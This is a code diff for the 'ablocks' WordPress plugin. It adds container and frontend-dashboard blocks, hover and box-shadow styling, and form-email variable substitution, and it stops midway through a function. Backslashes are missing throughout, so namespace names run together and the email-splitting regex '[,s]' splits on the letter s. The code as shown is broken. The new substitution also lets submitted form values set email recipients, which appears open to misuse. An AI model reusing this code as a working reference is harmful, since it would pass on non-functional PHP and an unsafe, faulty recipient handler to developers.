+		'unitDefaultValue' => 'px',
+		'defaultValue' => 290,
+	]),
+);
+
+return array_merge( $attributes, ABlocksClassesBlockGlobal::get_attributes() );
--- a/ablocks/includes/blocks/academy-container/block.php
+++ b/ablocks/includes/blocks/academy-container/block.php
@@ -0,0 +1,59 @@
+<?php
+namespace ABlocksBlocksAcademyContainer;
+
+if ( ! defined( 'ABSPATH' ) ) {
+	exit;
+}
+
+use ABlocksClassesBlockBaseAbstract;
+use ABlocksClassesCssGeneratorV2;
+use ABlocksControlsAlignment;
+use ABlocksControlsRange;
+use ABlocksControlsDimensions;
+use ABlocksHelper;
+
+
+class Block extends BlockBaseAbstract {
+	protected $parent_block_name = 'academy-certificate';
+	protected $block_name = 'academy-container';
+
+	public function build_css( $attributes ) {
+		$css_generator = new CssGeneratorV2( $attributes, $this->block_name );
+		$css_generator->add_class_styles(
+			'{{WRAPPER}} .academy-inner-container > div ',
+			$this->get_wrapper_css( $attributes ),
+			$this->get_wrapper_css( $attributes, 'Tablet' ),
+			$this->get_wrapper_css( $attributes, 'Mobile' )
+		);
+		return $css_generator->generate_css();
+	}
+
+	public function get_wrapper_css( $attributes, $device = '' ) {
+		$css = [];
+
+		$float_css = Alignment::get_css(
+			$attributes['floatAlignment'] ?? [],
+			'float',
+			$device
+		);
+
+		if ( isset( $float_css['float'] ) && 'default' === $float_css['float'] ) {
+			unset( $float_css['float'] );
+		}
+
+		return array_merge(
+			$css, $float_css,
+			Range::get_css([
+				'attributeValue' => $attributes['containerWidth'],
+				'attribute_object_key' => 'value',
+				'isResponsive' => true,
+				'defaultValue' => 200,
+				'hasUnit' => true,
+				'unitDefaultValue' => 'px',
+				'property' => 'width',
+				'device' => $device,
+			]),
+			Dimensions::get_css( $attributes['floatMargin'] ?? [], 'margin', $device ),
+		);
+	}
+}
--- a/ablocks/includes/blocks/academy-course-media/block.php
+++ b/ablocks/includes/blocks/academy-course-media/block.php
@@ -81,7 +81,7 @@

 	}

-	public function get_featured_image_container_css($attributes, $device = '') {
+	public function get_featured_image_container_css( $attributes, $device = '' ) {
 		$alignment_value = $attributes['alignment'][ 'value' . $device ] ?? '';
 		$css = [];
 		if ( ! empty( $alignment_value ) ) {
@@ -92,7 +92,7 @@
 		return $css;
 	}

-	public function get_featured_image_hover_css($attributes, $device = '') {
+	public function get_featured_image_hover_css( $attributes, $device = '' ) {
 		$css = [];
 		$css['opacity']  = $attributes['imageOpacityH'] ?? '';
 		return array_merge(
@@ -100,7 +100,7 @@
 			BoxShadow::get_hover_css( $attributes['boxShadow'], '', $device ),
 		);
 	}
-
+

 	public function render_block_content( $attributes, $content, $block_instance ) {
 		$attr_array = [];
--- a/ablocks/includes/blocks/advance-list-item/block.php
+++ b/ablocks/includes/blocks/advance-list-item/block.php
@@ -50,6 +50,12 @@
 			Icon::get_wrapper_css( $attributes, 'Mobile' )
 		);
 		$css_generator->add_class_styles(
+			'{{WRAPPER}} .ablocks-icon-wrap:hover',
+			Icon::get_wrapper_hover_css( $attributes ),
+			Icon::get_wrapper_hover_css( $attributes, 'Tablet' ),
+			Icon::get_wrapper_hover_css( $attributes, 'Mobile' )
+		);
+		$css_generator->add_class_styles(
 			'{{WRAPPER}} .ablocks-icon-wrap img.ablocks-image-icon',
 			Icon::get_element_image_css( $attributes ),
 			Icon::get_element_image_css( $attributes, 'Tablet' ),
--- a/ablocks/includes/blocks/blocks.php
+++ b/ablocks/includes/blocks/blocks.php
@@ -95,8 +95,10 @@
 	'form-password',
 	'form-select',
 	'form-radio',
+	'frontend-dashboard',
 	'text-path',
 	// Academy LMS
+	'academy-container',
 	'academy-certificate',
 	'academy-certificate-id',
 	'academy-certificate-text',
@@ -125,5 +127,9 @@
 	'storeengine-shipping-info',
 	'storeengine-order-details',
 	'storeengine-mini-cart',
-
+	'storeengine-cart-notice',
+	'storeengine-product-gallery',
+	'storeengine-product-summary',
+	'storeengine-product-description',
+	'storeengine-product-review',
 ];
--- a/ablocks/includes/blocks/breadcrumb/block.php
+++ b/ablocks/includes/blocks/breadcrumb/block.php
@@ -89,13 +89,13 @@
 		$css = [];

 		if ( ! empty( $attributes['breadcrumbTitlecolor'] ) ) {
-			$css['color'] = $attributes['breadcrumbTitlecolor'];
+			$css['color'] = Color::get_css( $attributes['breadcrumbTitlecolor'] );
 		}

 		$dir     = isset( $attributes['taxonomyTitleDirection'] ) ? $attributes['taxonomyTitleDirection'] : null;
 		$dirCss  = ! is_null( $dir ) ? get_alignment_css( $dir, 'justify-content', $device ) : [];
 		if ( ! empty( $attributes['breadcrumbItemBackground'] ) ) {
-			$css['background-color'] = $attributes['breadcrumbItemBackground'];
+			$css['background-color'] = Color::get_css( $attributes['breadcrumbItemBackground'] );
 		}
 		$typographyValueGlobal = ! empty( $attributes['breadcrumbTitleTypographyGlobal'] ) ? $attributes['breadcrumbTitleTypographyGlobal'] : '';
 		return array_merge(
@@ -110,7 +110,7 @@
 		$css = [];

 		if ( ! empty( $attributes['breadcrumbLinkcolor'] ) ) {
-			$css['color'] = $attributes['breadcrumbLinkcolor'];
+			$css['color'] = Color::get_css( $attributes['breadcrumbLinkcolor'] );
 		}

 		return $css;
@@ -120,7 +120,7 @@
 		$css = [];

 		if ( ! empty( $attributes['breadcrumbHoverLinkcolor'] ) ) {
-			$css['color'] = $attributes['breadcrumbHoverLinkcolor'];
+			$css['color'] = Color::get_css( $attributes['breadcrumbHoverLinkcolor'] );
 		}

 		return $css;
@@ -130,7 +130,7 @@
 		$css = [];

 		if ( ! empty( $attributes['breadcrumbseparatorcolor'] ) ) {
-			$css['color'] = $attributes['breadcrumbseparatorcolor'];
+			$css['color'] = Color::get_css( $attributes['breadcrumbseparatorcolor'] );
 		}

 		if ( ! empty( $attributes['breadcrumbseparsize'] ) ) {
@@ -144,7 +144,7 @@
 		$css = [];

 		if ( ! empty( $attributes['beforeBreadcrumbBackgroundcolor'] ) ) {
-			$css['background-color'] = $attributes['beforeBreadcrumbBackgroundcolor'];
+			$css['background-color'] = Color::get_css( $attributes['beforeBreadcrumbBackgroundcolor'] );
 		}

 		return array_merge(
--- a/ablocks/includes/blocks/button/block.php
+++ b/ablocks/includes/blocks/button/block.php
@@ -69,6 +69,12 @@
 			Icon::get_wrapper_css( $attributes, 'Tablet' ),
 			Icon::get_wrapper_css( $attributes, 'Mobile' )
 		);
+		$css_generator->add_class_styles(
+			'{{WRAPPER}} .ablocks-icon-wrap:hover',
+			Icon::get_wrapper_hover_css( $attributes ),
+			Icon::get_wrapper_hover_css( $attributes, 'Tablet' ),
+			Icon::get_wrapper_hover_css( $attributes, 'Mobile' )
+		);

 		$css_generator->add_class_styles(
 			'{{WRAPPER}}  .ablocks-icon-wrap img.ablocks-image-icon',
@@ -145,6 +151,12 @@
 			Icon::get_wrapper_css( $attributes, 'Tablet' ),
 			Icon::get_wrapper_css( $attributes, 'Mobile' )
 		);
+		$css_generator->add_class_styles(
+			'{{WRAPPER}} .ablocks-icon-wrap:hover',
+			Icon::get_wrapper_hover_css( $attributes ),
+			Icon::get_wrapper_hover_css( $attributes, 'Tablet' ),
+			Icon::get_wrapper_hover_css( $attributes, 'Mobile' )
+		);

 		$css_generator->add_class_styles(
 			'{{WRAPPER}}  .ablocks-icon-wrap img.ablocks-image-icon',
--- a/ablocks/includes/blocks/carousel/attributes.php
+++ b/ablocks/includes/blocks/carousel/attributes.php
@@ -5,6 +5,7 @@
 use ABlocksControlsBorder;
 use ABlocksComponentsButtonGroup;
 use ABlocksControlsDimensions;
+use ABlocksControlsBoxShadow;
 $attributes = [
 	'block_id'          => [
 		'type'          => 'string',
@@ -129,6 +130,7 @@
 	Border::get_attribute( 'paginationBorder', true ),
 	Border::get_attribute( 'activePaginationBorder', true ),
 	Dimensions::get_attribute( 'navigationIconPadding', true ),
+	BoxShadow::get_attribute( 'navigationIconBoxShadow', true ),
 	Range::get_attribute([
 		'attributeName' => 'carouselHeight',
 		'attributeObjectKey' => 'value',
--- a/ablocks/includes/blocks/carousel/block.php
+++ b/ablocks/includes/blocks/carousel/block.php
@@ -9,6 +9,7 @@
 use ABlocksControlsDimensions;
 use ABlocksControlsBorder;
 use ABlocksControlsColor;
+use ABlocksControlsBoxShadow;



@@ -313,6 +314,7 @@
 			$navigation_icon_svg_css,
 			Dimensions::get_css( $attributes['navigationIconPadding'], 'padding', $device ),
 			Border::get_css( $attributes['navigationIconBorder'], '', $device ),
+			BoxShadow::get_css( $attributes['navigationIconBoxShadow'], $device ),
 		);
 	}
 	public function get_navigation_icon_svg_hover_css( $attributes, $device = '' ) {
@@ -334,6 +336,7 @@
 			]),
 			$navigation_icon_svg_hover_css,
 			Border::get_hover_css( $attributes['navigationIconBorder'], '', $device ),
+			BoxShadow::get_hover_css( $attributes['navigationIconBoxShadow'], '', $device ),
 		);
 	}

--- a/ablocks/includes/blocks/counter/block.php
+++ b/ablocks/includes/blocks/counter/block.php
@@ -73,6 +73,13 @@
 			Icon::get_wrapper_css( $attributes, 'Tablet' ),
 			Icon::get_wrapper_css( $attributes, 'Mobile' )
 		);
+				$css_generator->add_class_styles(
+					'{{WRAPPER}} .ablocks-icon-wrap:hover',
+					Icon::get_wrapper_hover_css( $attributes ),
+					Icon::get_wrapper_hover_css( $attributes, 'Tablet' ),
+					Icon::get_wrapper_hover_css( $attributes, 'Mobile' )
+				);
+
 		$css_generator->add_class_styles(
 			'{{WRAPPER}}  .ablocks-icon-wrap img.ablocks-image-icon',
 			Icon::get_element_image_css( $attributes ),
@@ -177,6 +184,12 @@
 			Icon::get_wrapper_css( $attributes, 'Mobile' )
 		);
 		$css_generator->add_class_styles(
+			'{{WRAPPER}} .ablocks-icon-wrap:hover',
+			Icon::get_wrapper_hover_css( $attributes ),
+			Icon::get_wrapper_hover_css( $attributes, 'Tablet' ),
+			Icon::get_wrapper_hover_css( $attributes, 'Mobile' )
+		);
+		$css_generator->add_class_styles(
 			'{{WRAPPER}}  .ablocks-icon-wrap img.ablocks-image-icon',
 			Icon::get_element_image_css( $attributes ),
 			Icon::get_element_image_css( $attributes, 'Tablet' ),
--- a/ablocks/includes/blocks/coupon/block.php
+++ b/ablocks/includes/blocks/coupon/block.php
@@ -37,6 +37,12 @@
 			Icon::get_wrapper_css( $attributes, 'Tablet' ),
 			Icon::get_wrapper_css( $attributes, 'Mobile' )
 		);
+		$css_generator->add_class_styles(
+			'{{WRAPPER}} .ablocks-icon-wrap:hover',
+			Icon::get_wrapper_hover_css( $attributes ),
+			Icon::get_wrapper_hover_css( $attributes, 'Tablet' ),
+			Icon::get_wrapper_hover_css( $attributes, 'Mobile' )
+		);

 		$css_generator->add_class_styles(
 			'{{WRAPPER}}  .ablocks-icon-wrap img.ablocks-image-icon',
@@ -94,6 +100,12 @@
 			Icon::get_wrapper_css( $attributes, 'Tablet' ),
 			Icon::get_wrapper_css( $attributes, 'Mobile' )
 		);
+		$css_generator->add_class_styles(
+			'{{WRAPPER}} .ablocks-icon-wrap:hover',
+			Icon::get_wrapper_hover_css( $attributes ),
+			Icon::get_wrapper_hover_css( $attributes, 'Tablet' ),
+			Icon::get_wrapper_hover_css( $attributes, 'Mobile' )
+		);

 		$css_generator->add_class_styles(
 			'{{WRAPPER}}  .ablocks-icon-wrap img.ablocks-image-icon',
--- a/ablocks/includes/blocks/divider/block.php
+++ b/ablocks/includes/blocks/divider/block.php
@@ -53,6 +53,13 @@
 			Icon::get_wrapper_css( $attributes, 'Mobile' )
 		);
 		$css_generator->add_class_styles(
+			'{{WRAPPER}} .ablocks-divider__element-icon .ablocks-icon-wrap:hover',
+			Icon::get_wrapper_hover_css( $attributes ),
+			Icon::get_wrapper_hover_css( $attributes, 'Tablet' ),
+			Icon::get_wrapper_hover_css( $attributes, 'Mobile' )
+		);
+
+		$css_generator->add_class_styles(
 			'{{WRAPPER}}  .ablocks-divider__element-icon .ablocks-icon-wrap',
 			array_merge( Icon::get_wrapper_css( $attributes ), $this->get_icon_spacing_margins( $attributes, '' ) ),
 			array_merge( Icon::get_wrapper_css( $attributes, 'Tablet' ), $this->get_icon_spacing_margins( $attributes, 'Tablet' ) ),
@@ -124,6 +131,12 @@
 			Icon::get_wrapper_css( $attributes, 'Mobile' )
 		);
 		$css_generator->add_class_styles(
+			'{{WRAPPER}} .ablocks-divider__element-icon .ablocks-icon-wrap:hover',
+			Icon::get_wrapper_hover_css( $attributes ),
+			Icon::get_wrapper_hover_css( $attributes, 'Tablet' ),
+			Icon::get_wrapper_hover_css( $attributes, 'Mobile' )
+		);
+		$css_generator->add_class_styles(
 			'{{WRAPPER}}  .ablocks-divider__element-icon .ablocks-icon-wrap',
 			array_merge( Icon::get_wrapper_css( $attributes ), $this->get_icon_spacing_margins( $attributes, '' ) ),
 			array_merge( Icon::get_wrapper_css( $attributes, 'Tablet' ), $this->get_icon_spacing_margins( $attributes, 'Tablet' ) ),
--- a/ablocks/includes/blocks/form-builder/actions/send-email.php
+++ b/ablocks/includes/blocks/form-builder/actions/send-email.php
@@ -110,6 +110,7 @@
 	 * @return void
 	 */
 	private function contact_form_send_email( string $num = 'One' ): void {
+		$this->user_email = $this->apply_vars( $this->user_email );
 		// check email notification is enabled or not
 		$nums = [
 			'One' => '',
@@ -124,26 +125,28 @@
 		}
 		$config = $this->validateformdata->form_info['info']['config'];

-		$to_email = sanitize_text_field( $config[ 'email' . $num . 'To' ] ?? $this->admin_email );
+		$to_email = $this->apply_vars( sanitize_text_field( $config[ 'email' . $num . 'To' ] ?? $this->admin_email ) );

-		$subject = sanitize_text_field( $config[ 'email' . $num . 'Subject' ] ?? '' );
+		$subject = $this->apply_vars( sanitize_text_field( $config[ 'email' . $num . 'Subject' ] ?? '' ) );
 		// translators: %s is email
 		$subject = $subject ? $subject : ( $this->user_email ? sprintf( __( 'You have a message from %s', 'ablocks' ), $this->user_email ) : __( 'You have a message', 'ablocks' ) );

 		$type    = strtolower( sanitize_text_field( $config[ 'email' . $num . 'Type' ] ?? 'html' ) );
-		$message = sanitize_text_field( $config[ 'email' . $num . 'Message' ] ?? '' );
+		$message = $this->apply_vars( sanitize_text_field( $config[ 'email' . $num . 'Message' ] ?? '' ) );
 		// check {all-fields} exists or not
+		$message = empty( $message ) ? '{all-fields}' : $message;
 		if ( preg_match( '|{all-fields}|im', $message ) ) {
 			// if exist then replace this text to data table
 			$message = str_replace( '{all-fields}', $this->get_data_as_table_format( $type ), $message );
-		} elseif ( $message ) {
-			// if message is defined by user and {all-fields} is not available
-			// then insert datatable at the end of msg
-			$message .= $this->get_data_as_table_format( $type );
-		} else {
-			// if msg is not defined by user, the add only datatable
-			$message = $this->get_data_as_table_format( $type );
 		}
+		// elseif ( $message ) {
+		// if message is defined by user and {all-fields} is not available
+		// then insert datatable at the end of msg
+		// $message .= $this->get_data_as_table_format( $type );
+		// } else {
+		// if msg is not defined by user, the add only datatable
+		// $message = $this->get_data_as_table_format( $type );
+		// }
 		$headers = [];

 		$from_email = sanitize_text_field( $config[ 'email' . $num . 'FormEmail' ] ?? '' );
@@ -160,14 +163,24 @@
 		if ( $reply_to ) {
 			$headers[] = 'Reply-To: ' . $reply_to;
 		}
-
 		if ( $cc ) {
-			$headers[] = 'CC: ' . $cc;
+			$headers[] = 'CC: ' . implode( ',', array_unique(
+				preg_split(
+					'|[,s]|', $this->apply_vars( strval( $cc ) )
+				)
+			) );
 		}
 		if ( $bcc ) {
-			$headers[] = 'BCC: ' . $bcc;
+			$headers[] = 'BCC: ' . implode( ',', array_unique(
+				preg_split(
+					'|[,s]|', $this->apply_vars( strval( $bcc ) )
+				)
+			) );
 		}

+		if ( $type === 'plain' ) {
+			$headers[] = 'Content-Type: text/plain; charset=UTF-8';
+		}
 		$template = $type === 'plain' ? 'email/plain-text/contact-email.php' : 'email/contact-email.php';

 		ob_start();
@@ -177,8 +190,32 @@
 			]);

 		$data = ob_get_clean();
+		foreach ( array_unique( preg_split( '|[,s]|', strval( $to_email ) ) ) as $email ) {
+			$email = trim( $email );
+			if ( ! empty( $email ) ) {
+				$this->send_email( $subject, $data, $email, $headers );
+			}
+		}

-		$this->send_email( $subject, $data, $to_email, $headers );
+	}
+
+	private function apply_vars( ?string $msg ): ?string {
+		$admin_email = get_option( 'admin_email' );
+		$current_user = wp_get_current_user();
+		$current_user_email = $current_user->user_email;
+
+		$fields = array_merge(
+			$this->validateformdata->form_info['data'] ?? [],
+			[
+				'admin_email'  => [ 'value' => $admin_email ],
+				'user_email'   => [ 'value' => $current_user_email ]
+			]
+		);
+		// wp_send_json($fields);
+		foreach ( $fields as $key => [ 'value' => $val ] ) {
+			$msg = str_replace( "{{$key}}", $val, $msg );
+		}
+		return $msg;
 	}

 	/**
--- a/ablocks/includes/blocks/form-builder/attributes.php
+++ b/ablocks/includes/blocks/form-builder/attributes.php
@@ -113,7 +113,7 @@
 	// email One settings
 	'emailOneTo' => [
 		'type' => 'string',
-		'default' => 'someone@example.com'
+		'default' => ''
 	],
 	'emailOneSubject' => [
 		'type' => 'string',
@@ -125,7 +125,7 @@
 	],
 	'emailOneFormEmail' => [
 		'type' => 'string',
-		'default' => 'someone@example.com'
+		'default' => ''
 	],
 	'emailOneFormName' => [
 		'type' => 'string',
@@ -133,7 +133,7 @@
 	],
 	'emailOneReplyTo' => [
 		'type' => 'string',
-		'default' => 'someone@example.com'
+		'default' => ''
 	],
 	'emailOneCc' => [
 		'type' => 'string',
@@ -150,7 +150,7 @@
 	// email two settings
 	'emailTwoTo' => [
 		'type' => 'string',
-		'default' => 'someone@example.com'
+		'default' => ''
 	],
 	'emailTwoSubject' => [
 		'type' => 'string',
@@ -162,7 +162,7 @@
 	],
 	'emailTwoFormEmail' => [
 		'type' => 'string',
-		'default' => 'someone@example.com'
+		'default' => ''
 	],
 	'emailTwoFormName' => [
 		'type' => 'string',
@@ -170,7 +170,7 @@
 	],
 	'emailTwoReplyTo' => [
 		'type' => 'string',
-		'default' => 'someone@example.com'
+		'default' => ''
 	],
 	'emailTwoCc' => [
 		'type' => 'string',
@@ -508,9 +508,28 @@
 	'roleSlug' => [
 		'type' => 'string',
 		'default' => '',
-	]
-];
+	],
+	'confirmationNotice' => [
+		'type' => 'string',
+		'default' => 'Form successfully submitted!'

+	],
+	'afterFormSubmission' => [
+		'type' => 'string',
+		'default' => 'reset'
+
+	],
+	'customUrl' => [
+		'type' => 'string',
+		'default' => ''
+
+	],
+	'confirmationType' => [
+		'type' => 'string',
+		'default' => 'success'
+
+	],
+];
 $attributes = array_merge(
 	$attributes,
 	Alignment::get_attribute( 'labelAlignment', true, [ 'value' => 'left' ] ),
--- a/ablocks/includes/blocks/form-checkbox/attributes.php
+++ b/ablocks/includes/blocks/form-checkbox/attributes.php
@@ -12,7 +12,7 @@
 	),
 	'label' => [
 		'type' => 'string',
-		'default' => '',
+		'default' => 'Checkbox',
 	],

 	'errorMsg' => [
--- a/ablocks/includes/blocks/form-textarea/attributes.php
+++ b/ablocks/includes/blocks/form-textarea/attributes.php
@@ -23,7 +23,7 @@
 		'type' => 'string',
 		'default' => '',
 	],
-	'inputType' => [
+	'nameType' => [
 		'type' => 'string',
 		'default' => '',
 	],
--- a/ablocks/includes/blocks/frontend-dashboard/attributes.php
+++ b/ablocks/includes/blocks/frontend-dashboard/attributes.php
@@ -0,0 +1,91 @@
+<?php
+
+use ABlocksControlsTypography;
+use ABlocksControlsTextShadow;
+use ABlocksControlsTextStroke;
+use ABlocksControlsBackground;
+use ABlocksControlsBorder;
+use ABlocksControlsDimensions;
+use ABlocksControlsIcon;
+use ABlocksControlsRange;
+
+
+if ( ! defined( 'ABSPATH' ) ) {
+	exit;
+}
+
+$attributes = [
+	'block_id' => array(
+		'type' => 'string',
+		'default' => '',
+	),
+	'dashboard_page' => array(
+		'type' => 'string',
+		'default' => '',
+	),
+	'sidebarBackground' => array(
+		'type' => 'string',
+		'default' => '',
+	),
+	'sidebarUserBackground' => array(
+		'type' => 'string',
+		'default' => '',
+	),
+	'contentBackground' => array(
+		'type' => 'string',
+		'default' => '',
+	),
+	'userTextColor' => array(
+		'type' => 'string',
+		'default' => '',
+	),
+	'breadcrumbColor' => array(
+		'type' => 'string',
+		'default' => '',
+	),
+	'menuListActiveBackground' => array(
+		'type' => 'string',
+		'default' => '',
+	),
+	'menuListActiveTextColor' => array(
+		'type' => 'string',
+		'default' => '',
+	),
+	'menuListHoverBackground' => array(
+		'type' => 'string',
+		'default' => '',
+	),
+	'menuListHoverTextColor' => array(
+		'type' => 'string',
+		'default' => '',
+	),
+	'menuListBackground' => array(
+		'type' => 'string',
+		'default' => '',
+	),
+	'menuListTextColor' => array(
+		'type' => 'string',
+		'default' => '',
+	),
+];
+
+
+return array_merge(
+	$attributes,
+	Range::get_attribute([
+		'attributeName' => 'bothGap',
+		'isResponsive' => false,
+		'defaultValue' => 30,
+	]),
+	Border::get_attribute( 'sidebarBorder', true ),
+	Border::get_attribute( 'userSidebarBorder', true ),
+	Border::get_attribute( 'menuListBorder', true ),
+	Border::get_attribute( 'contentBorder', true ),
+	Typography::get_attribute( 'userTypography', true ),
+	Typography::get_attribute( 'breadcrumbtTypography', true ),
+	Typography::get_attribute( 'menuListTypography', true ),
+	Dimensions::get_attribute( 'menuListPadding', true ),
+	Dimensions::get_attribute( 'contentPadding', true ),
+	ABlocksClassesBlockGlobal::get_attributes()
+);
+
--- a/ablocks/includes/blocks/frontend-dashboard/block.php
+++ b/ablocks/includes/blocks/frontend-dashboard/block.php
@@ -0,0 +1,451 @@
+<?php
+namespace ABlocksBlocksFrontendDashboard;
+
+if ( ! defined( 'ABSPATH' ) ) {
+	exit;
+}
+
+use ABlocksClassesBlockBaseAbstract;
+use ABlocksClassesCssGenerator;
+use ABlocksHelper;
+use ABlocksControlsTypography;
+use ABlocksControlsTextShadow;
+use ABlocksControlsTextStroke;
+use ABlocksControlsBackground;
+use ABlocksControlsBorder;
+use ABlocksControlsDimensions;
+use ABlocksControlsRange;
+use ABlocksControlsColor;
+
+
+class Block extends BlockBaseAbstract {
+	protected $block_name = 'frontend-dashboard';
+
+	public function __construct() {
+		parent::__construct();
+
+	}
+
+	public function build_css( $attributes ) {
+
+		$css_generator = new CssGenerator( $attributes, $this->block_name );
+
+		$get_gaps_css = $this->get_wrapper_gap_css( $attributes );
+		$css_generator->add_class_styles(
+			'{{WRAPPER}}.ablocks-block--frontend-dashboard',
+			$get_gaps_css,
+			$this->get_wrapper_gap_css( $attributes, 'Tablet' ),
+			$this->get_wrapper_gap_css( $attributes, 'Mobile' )
+		);
+
+		$get_setting_css = $this->get_setting_css( $attributes );
+
+		$css_generator->add_class_styles(
+			'{{WRAPPER}} .ablocks-frontend-dashboard-sidebar',
+			$get_setting_css,
+			$this->get_setting_css( $attributes, 'Tablet' ),
+			$this->get_setting_css( $attributes, 'Mobile' )
+		);
+
+		$get_user_setting_css = $this->get_user_setting_css( $attributes );
+
+		$css_generator->add_class_styles(
+			'{{WRAPPER}} .ablocks-frontend-dashboard-user',
+			$get_user_setting_css,
+			$this->get_user_setting_css( $attributes, 'Tablet' ),
+			$this->get_user_setting_css( $attributes, 'Mobile' )
+		);
+
+		$get_menu_list_css = $this->get_menu_list_css( $attributes );
+
+		$css_generator->add_class_styles(
+			'{{WRAPPER}} .ablocks-frontend-dashboard-menu__item a',
+			$get_menu_list_css,
+			$this->get_menu_list_css( $attributes, 'Tablet' ),
+			$this->get_menu_list_css( $attributes, 'Mobile' )
+		);
+
+		$get_menu_hover_list_css = $this->get_menu_hover_list_css( $attributes );
+
+		$css_generator->add_class_styles(
+			'{{WRAPPER}} .ablocks-frontend-dashboard-menu__item a:hover',
+			$get_menu_hover_list_css,
+			$this->get_menu_hover_list_css( $attributes, 'Tablet' ),
+			$this->get_menu_hover_list_css( $attributes, 'Mobile' )
+		);
+
+		$get_menu_active_list_css = $this->get_menu_active_list_css( $attributes );
+
+		$css_generator->add_class_styles(
+			'{{WRAPPER}} .ablocks-frontend-dashboard-menu__item--current a',
+			$get_menu_active_list_css,
+			$this->get_menu_active_list_css( $attributes, 'Tablet' ),
+			$this->get_menu_active_list_css( $attributes, 'Mobile' )
+		);
+
+		$get_breadcrumb_css = $this->get_breadcrumb_css( $attributes );
+
+		$css_generator->add_class_styles(
+			'{{WRAPPER}} .ablocks-frontend-dashboard-breadcrumb li',
+			$get_breadcrumb_css,
+			$this->get_breadcrumb_css( $attributes, 'Tablet' ),
+			$this->get_breadcrumb_css( $attributes, 'Mobile' )
+		);
+
+		$get_breadcrumb_css = $this->get_breadcrumb_css( $attributes );
+
+		$css_generator->add_class_styles(
+			'{{WRAPPER}} .ablocks-frontend-dashboard-breadcrumb li + li::before',
+			$get_breadcrumb_css,
+			$this->get_breadcrumb_css( $attributes, 'Tablet' ),
+			$this->get_breadcrumb_css( $attributes, 'Mobile' )
+		);
+
+		$get_content_css = $this->get_content_css( $attributes );
+
+		$css_generator->add_class_styles(
+			'{{WRAPPER}} .ablocks-frontend-dashboard-content',
+			$get_content_css,
+			$this->get_content_css( $attributes, 'Tablet' ),
+			$this->get_content_css( $attributes, 'Mobile' )
+		);
+
+		$get_content_hover_css = $this->get_content_hover_css( $attributes );
+
+		$css_generator->add_class_styles(
+			'{{WRAPPER}} .ablocks-frontend-dashboard-content:hover',
+			$get_content_hover_css,
+			$this->get_content_hover_css( $attributes, 'Tablet' ),
+			$this->get_content_hover_css( $attributes, 'Mobile' )
+		);
+
+		return $css_generator->generate_css();
+	}
+
+
+	public function get_setting_css( $attributes, $device = '' ) {
+		$css = [];
+
+		if ( ! empty( $attributes['sidebarBackground'] ) ) {
+			$css['background'] = Color::get_css(
+			isset( $attributes['sidebarBackground'] ) ? $attributes['sidebarBackground'] : '');
+		}
+
+		return array_merge(
+			$css,
+			Border::get_css( $attributes['sidebarBorder'] ?? [], '', $device )
+		);
+	}
+
+	public function get_user_setting_css( $attributes, $device = '' ) {
+		$css = [];
+
+		if ( ! empty( $attributes['userTextColor'] ) ) {
+			$css['color'] = Color::get_css(
+			isset( $attributes['userTextColor'] ) ? $attributes['userTextColor'] : '');
+		}
+		if ( ! empty( $attributes['sidebarUserBackground'] ) ) {
+			$css['background'] = Color::get_css(
+			isset( $attributes['sidebarUserBackground'] ) ? $attributes['sidebarUserBackground'] : '');
+		}
+		$userTypographyGlobal = ! empty( $attributes['userTypographyGlobal'] ) ? $attributes['userTypographyGlobal'] : '';
+		return array_merge(
+			$css,
+			Border::get_css( $attributes['userSidebarBorder'] ?? [], '', $device ),
+			Typography::get_css( $attributes['userTypography'], '', $device, $userTypographyGlobal ),
+		);
+	}
+
+	public function get_menu_list_css( $attributes, $device = '' ) {
+		$css = [];
+
+		if ( ! empty( $attributes['menuListTextColor'] ) ) {
+			$css['color'] = Color::get_css(
+			isset( $attributes['menuListTextColor'] ) ? $attributes['menuListTextColor'] : '');
+		}
+		if ( ! empty( $attributes['menuListBackground'] ) ) {
+			$css['background'] = Color::get_css(
+			isset( $attributes['menuListBackground'] ) ? $attributes['menuListBackground'] : '');
+		}
+
+		$userTypographyGlobal = ! empty( $attributes['userTypographyGlobal'] ) ? $attributes['userTypographyGlobal'] : '';
+
+		return array_merge(
+			$css,
+			Border::get_css( $attributes['menuListBorder'] ?? [], '', $device ),
+			Dimensions::get_css( $attributes['menuListPadding'] ?? [], 'padding', $device ),
+			Typography::get_css( $attributes['menuListTypography'] ?? [], '', $device, $userTypographyGlobal )
+		);
+	}
+
+	public function get_menu_hover_list_css( $attributes, $device = '' ) {
+		$css = [];
+
+		if ( ! empty( $attributes['menuListHoverTextColor'] ) ) {
+			$css['color'] = Color::get_css(
+			isset( $attributes['menuListHoverTextColor'] ) ? $attributes['menuListHoverTextColor'] : '');
+		}
+		if ( ! empty( $attributes['menuListHoverBackground'] ) ) {
+			$css['background'] = Color::get_css(
+			isset( $attributes['menuListHoverBackground'] ) ? $attributes['menuListHoverBackground'] : '');
+		}
+
+		return array_merge(
+			$css,
+			Border::get_hover_css( $attributes['menuListBorder'] ?? [], '', $device )
+		);
+	}
+
+	public function get_menu_active_list_css( $attributes, $device = '' ) {
+		$css = [];
+
+		if ( ! empty( $attributes['menuListActiveTextColor'] ) ) {
+			$css['color'] = Color::get_css(
+			isset( $attributes['menuListActiveTextColor'] ) ? $attributes['menuListActiveTextColor'] : '');
+		}
+		if ( ! empty( $attributes['menuListActiveBackground'] ) ) {
+			$css['background'] = Color::get_css(
+			isset( $attributes['menuListActiveBackground'] ) ? $attributes['menuListActiveBackground'] : '');
+		}
+
+		return $css;
+	}
+	public function get_content_css( $attributes, $device = '' ) {
+		$css = [];
+
+		if ( ! empty( $attributes['contentBackground'] ) ) {
+			$css['background'] = Color::get_css(
+			isset( $attributes['contentBackground'] ) ? $attributes['contentBackground'] : '');
+		}
+
+		return array_merge(
+			$css,
+			Border::get_css( $attributes['contentBorder'] ?? [], '', $device ),
+			Dimensions::get_css( $attributes['contentPadding'] ?? [], 'padding', $device ),
+		);
+	}
+	public function get_content_hover_css( $attributes, $device = '' ) {
+
+		return array_merge(
+			Border::get_hover_css( $attributes['contentBorder'] ?? [], '', $device ),
+		);
+	}
+
+	public function get_breadcrumb_css( $attributes, $device = '' ) {
+		$css = [];
+
+		if ( ! empty( $attributes['breadcrumbColor'] ) ) {
+			$css['color'] = Color::get_css(
+			isset( $attributes['breadcrumbColor'] ) ? $attributes['breadcrumbColor'] : '');
+		}
+		$breadcrumbtTypographyGlobal = ! empty( $attributes['breadcrumbtTypographyGlobal'] ) ? $attributes['breadcrumbtTypographyGlobal'] : '';
+
+		return array_merge(
+			$css,
+			Typography::get_css( $attributes['breadcrumbtTypography'] ?? [], '', $device, $breadcrumbtTypographyGlobal )
+		);
+	}
+	public function get_wrapper_gap_css( $attributes, $device = '' ) {
+		$css = [];
+
